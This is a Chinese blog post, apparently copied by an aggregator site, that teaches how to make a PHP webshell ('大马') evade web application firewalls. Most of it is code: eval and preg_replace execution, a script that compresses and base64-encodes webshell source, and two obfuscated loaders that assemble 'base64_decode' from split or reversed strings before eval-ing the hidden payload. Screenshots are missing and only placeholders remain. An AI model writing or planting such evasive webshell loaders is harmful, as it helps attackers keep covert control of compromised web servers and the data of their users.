php大马免杀技巧 | bypass waf

Posted s0mf

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了php大马免杀技巧 | bypass waf相关的知识,希望对你有一定的参考价值。

Part 1 前言

  技术分享图片

 

Part 2 免杀

  执行代码

eval 或 preg_replace的/e修饰符来执行大马代码。

 

 

   技术分享图片

$a = ‘phpinfo();‘;
eval($a);
//eval执行php代码

 

  编码

如果直接去执行代码,是过不了waf的,我们一般需要将大马源码进行编码。

 

技术分享图片

 

eval_gzinflate_base64类型加密与解密:

http://www.zhuisu.net/tool/phpencode.php

https://www.mobilefish.com/services/eval_gzinflate_base64/eval_gzinflate_base64.php

 

自己写脚本加密:

$code= file_get_contents(‘D:phpStudyWWWTestlibhelp.txt‘); //大马源码路径
$encode = base64_encode(gzdeflate($code));  //加密函数自己修改就行
echo $encode; //输出加密后代码

 

  解码

通过解码执行我们的代码。

 

  技术分享图片

 

  技术分享图片

<?php                         //加密的代码
eval(gzinflate(base64_decode(‘S03OyFdQ8shUKLbMTVOyBgA=‘)));
?>

 

  关键字免杀

// 类型这样的关键字如果没有混淆拆分是过不了waf的
eval(gzinflate(base64_decode

// 我们需要做的就是关键字免杀

 

  免杀 payload

<?php
$l=‘baSe6‘;
$o=‘4_dE‘;
$v=‘cO‘;
$e=‘DE‘;
$love=$l.$o.$v.$e;
$c = "love";
$a=$$c(‘源码base64加密‘);
eval($a);
?>

<?php
$a = strrev(‘EdOcEd_46eSaB‘); 
$b= $a(‘源码base64加密‘);
eval($b);
?>

 

 

 

 

 

  

  

以上是关于php大马免杀技巧 | bypass waf的主要内容,如果未能解决你的问题,请参考以下文章

Bypass AV meterpreter免杀技巧

Webshell免杀绕过waf

PHP-WebShell-Bypass-WAF

bypass各种waf--php回调后门

bypass各种waf--php回调后门

不可不学!一些webshell免杀的技巧